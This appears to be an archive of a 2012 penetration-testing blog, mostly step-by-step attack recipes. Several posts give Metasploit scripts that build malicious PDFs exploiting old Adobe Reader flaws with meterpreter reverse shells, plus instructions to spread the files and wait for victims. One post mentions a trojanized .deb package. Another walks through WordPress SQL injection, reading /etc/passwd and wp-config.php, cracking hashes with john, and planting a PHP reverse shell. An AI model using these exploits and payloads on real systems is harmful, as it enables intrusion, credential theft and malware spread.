blog_view_all_20120806

http://x73.cc/how-to-metasploit-db_autopwn-with-postgresql.html

http://zhaoxiaobu.blog.51cto.com/878176/d-5

http://hi.baidu.com/664169240/blog/index/1

继续阅读

发表在 Uncategorized | Comments Off on blog_view_all_20120806

something_may_future_use_20120806

http://www.lengmo.net/post/1293/#entrymore

网渗透利器–reDuh(webshell跳板)简单使用说明

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

继续阅读

发表在 Uncategorized | Comments Off on something_may_future_use_20120806

video-evil_deb

video upload to dropbox already

u can replace to any *.deb , we mean the source *.deb .

most importantly , many user of linux without Anti-virus

发表在 Uncategorized | Comments Off on video-evil_deb

Windows/fileformat/adobe_cooltype_sing

Vulnerability Reference

CVE-2010-2883

OSVDB-67849

Attacker Info:

OS:BT5, R2

Metasploit version:

Framework: 4.4.0-dev.15637

Console  : 4.4.0-dev.15613

Victim Info:

OS:WindowsXP SP3

Adobe Reader:9.0 en

Step:

1. craft a malicious pdf file and spread it out.

==================Exploit.rc======================

use exploit/windows/fileformat/adobe_cooltype_sing

set LHOST 192.168.100.230

set FILENAME cootype_sing.pdf

set payload windows/meterpreter/reverse_tcp

exploit

============================================

2. Listen

Listen on 4444 port

=======================get_meterpreter.rc============

use multi/handler

set LHOST 192.168.100.230

set payload windows/meterpreter/reverse_tcp

show options

exploit

====================================

3.Wait victim to open our pdf file

4.Success!

发表在 Uncategorized | Comments Off on Windows/fileformat/adobe_cooltype_sing

windows/fileformat/adobe_utilprint

C

this poc was written for educational purpose only.

use it at your own risk. Author will be not responsible for any.

=========================================

victim : bt5 r2

attack m : win xp Chinese sp3

=================rc========================

use windows/fileformat/adobe_utilprint

set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.94.128
set lport 777
show options
set filename oh.pdf
show options

===================  multi.rc=================

set lhost 192.168.94.128
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lport 777
show options

===================================

exp info

v M

back to A M

we success !!!!!

发表在 Uncategorized | Comments Off on windows/fileformat/adobe_utilprint

windows/fileformat/adobe_libtiff

C

this poc was written for educational purpose only.

use it at your own risk. Author will be not responsible for any.

=========================================

victim : bt5 r2

attack m : win xp Chinese sp3
=========================================

use windows/fileformat/adobe_libtiff

set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.94.128
set lport 777
show options
set filename oh.pdf
show options

===========multi.rc ================

set lhost 192.168.94.128
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lport 777
show options

===================================

exp info

v M

back to A M

we success !!!!!

发表在 Uncategorized | Comments Off on windows/fileformat/adobe_libtiff

exploit/windows/fileformat/adobe_jbig2decode

C

this poc was written for educational purpose only.

use it at your own risk. Author will be not responsible for any.

=========================================

victim : bt5 r2

attack m : bt5 r2

==================rc =======================

use exploit/windows/fileformat/adobe_jbig2decode

set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.94.128
set lport 777
show options
set filename oh.pdf
show options

===================multi .rc ======

set lhost 192.168.94.128
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lport 777
show options

===================================

exp info

v M

back to A M

we success !!!!!

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_jbig2decode

exploit/windows/fileformat/adobe_geticon

C

this poc was written for educational purpose only.

use it at your own risk. Author will be not responsible for any.

=========================================

victim : bt5 r2

attack m : bt5 r2

===================rc ======================

use exploit/windows/fileformat/adobe_geticon
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.94.128
set lport 777
show options
set filename oh.pdf
show options
=====================  meterpreter.rc ==========

set lhost 192.168.94.128
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lport 777
show options

===================================

exp info

v M

back to A M

we success !!!!!

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_geticon

exploit/windows/fileformat/adobe_collectemailinfo

C

this poc was written for educational purpose only.

use it at your own risk. Author will be not responsible for any.

=========================================

victim : bt5 r2

attack m : bt5 r2

====================  rc =====================

use exploit/windows/fileformat/adobe_collectemailinfo
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.94.128
set lport 777
show options
set filename oh.pdf
show options

===================    meterpreter.rc =============

set lhost 192.168.94.128
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lport 777
show options

===================================

exp info

v M

back to A M

we success !!!!!

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_collectemailinfo

WordPress < = 1.5.1.1 "add new admin" SQL Injection Exploit

video upload to dropbox already

/////////////////////////////////////

//////////////////////////////////////
admin
4debb7

cd /pentest/web/wpscan/

./wpscan.rb –url http://192.168.94.128/wordpress

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,2,3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,version(),3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,user(),3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,database(),3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5

root@bt:~# echo -n /etc/passwd | xxd -p –
2f6574632f706173737764

/////// add 0x

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5

///////// cat passwd

./sqlmap.py –url=http://192.168.94.128/wordpress/index.php?cat=0 –file-read=/etc/passwd

cat /pentest/database/sqlmap/output/192.168.94.128/files/_etc_passwd

///////////////////////////////////////////////////////////////////
/////////////////////////////////////////////
///////// guess passwd
./sqlmap.py –url=http://192.168.94.128/wordpress/index.php?cat=0 –password -v 0

echo 9CFBBC772F3F6C106020035386DA5BBBF1249A11 > /tmp/mysql

cat /pentest/database/sqlmap/output/192.168.94.128/files/_etc_passwd

////////// locate where is dir of wordpress

locate httpd.conf

./sqlmap.py –url=http://192.168.94.128/wordpress/index.php?cat=0 –file-read=/etc/apache2/httpd.conf

sorry about that , we have not it

./sqlmap.py –url=http://192.168.94.128/wordpress/index.php?cat=0 –file-read=/etc/httpd/conf/httpd.conf

///////// we guess the dir is /var/www/wordpress

./sqlmap.py –url=http://192.168.94.128/wordpress/index.php?cat=0 –file-read=/var/www/wordpress/wp-config.php

cat /pentest/database/sqlmap/output/192.168.94.128/files/_var_www_wordpress_wp-config.php

echo toor > /tmp/mysql_password

cd /pentest/passwords/john/

john /tmp/mysql –wordlist=/tmp/mysql_password –format=raw-sha
////////////////////////////////////////////////////////

////////////////////////////////////////////////////

//////// break U&P

http://wordpress.org

////search database descript

http://codex.wordpress.org/Database_Description/1.5#Table:_wp_users

////////// ox3a= 58 < 60
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users

curl –silent http://192.168.94.128/wordpress/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users | grep pagetitle | sed ‘s/.*;\(.*\)&.*/\1/’

for x in $(seq 1 6); do curl –silent http://192.168.94.128/wordpress/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep pagetitle | sed ‘s/.*;\(.*\)&.*/\1/’; done

gedit /tmp/wp

john /tmp/wp –wordlist=/opt/metasploit/apps/pro/msf3/data/john/wordlists/password.lst –format=raw-MD5

cat john.pot

cat /tmp/wp

//////// login and reverse a shell

cat /pentest/backdoors/web/webshells/php-reverse-shell.php

/// replace lhost and lport

nc -lvvp 777

http://192.168.94.128/wordpress/wp-content/plugins/

发表在 Uncategorized | Comments Off on WordPress < = 1.5.1.1 "add new admin" SQL Injection Exploit